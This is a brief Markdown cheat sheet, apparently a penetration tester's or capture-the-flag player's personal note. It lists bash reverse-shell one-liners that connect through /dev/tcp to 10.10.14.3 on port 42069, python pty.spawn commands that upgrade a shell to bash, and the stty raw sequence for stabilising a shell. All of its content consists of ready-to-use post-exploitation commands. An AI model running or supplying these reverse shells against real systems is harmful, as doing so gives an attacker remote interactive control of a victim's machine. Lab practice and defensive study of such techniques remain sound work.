# Shell

### RevTCP
* bash -i >& /dev/tcp/10.10.14.3/42069 0>&1
* /bin/bash -i >& /dev/tcp/10.10.14.3/42069 0>&1

### sh_to_bash

>python -c 'import pty; pty.spawn("/bin/bash");'

>python3 -c 'import pty; pty.spawn("/bin/bash");'


### decent shell
ctrl+z
stty raw -echo
fg


#tools #windows #linux #reverseshell 